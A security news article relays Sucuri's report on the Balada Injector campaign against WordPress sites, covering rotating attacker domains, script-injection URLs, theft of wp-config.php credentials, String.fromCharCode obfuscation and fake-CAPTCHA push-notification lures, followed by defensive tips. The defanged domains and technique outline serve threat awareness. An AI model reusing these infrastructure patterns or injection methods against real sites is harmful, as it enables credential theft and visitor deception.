A cyber attack campaign targeting WordPress websites has recently caused significant concern, with experts estimating that up to one million websites may have been compromised.
Sucuri has reported that the Balad Injector campaign operates in waves, with attacks occurring approximately once a month. To evade blocking lists and other security measures, the attackers use a freshly registered domain name for each wave of attacks.
In recent years, Balada Injector has exploited over 100 domains and a variety of methods to exploit existing security vulnerabilities (such as HTML injection and Site URL). The attackers mainly aimed to obtain database credentials from the wp-config.php file.
The majority of these domain names are usually combinations of two or four English words that are made up of nonsense information like:-
- sometimesfree[.]biz
- destinyfernandi[.]com
- travelfornamewalking[.]ga
- statisticline[.]com
Injections are performed by the use of URLs on a variety of subdomains within the current wave domain, such as:-
- java.sometimesfree[.]biz/counter.js – active 2017
- slow.destinyfernandi[.]com/slow.js – active 2020
- main.travelfornamewalking[.]ga/stat.js – active 2021
- cdn.statisticline[.]com/scripts/sway.js – active 2023
The activity, which also uses String.fromCharCode as an obfuscation technique, leads victims to booby-trapped pages that trick them into activating push notifications by masquerading as a fake check CAPTCHA for viewing misleading content.
Recommendations
Here below, we have mentioned all the basic and regular recommendations offered by the security analysts at Sucuri:-
- Make sure to keep all the website software and plugins updated
- Also, do not forget to keep your installed themes updated.
- Always use strong and unique passwords.
- Ensure implementation of two-factor authentication.
- Make sure to add file integrity systems.
- Always take regular backups of your website database.
Follow Us on: Twitter, Instagram, Facebook to get the latest security news!
Leave A Comment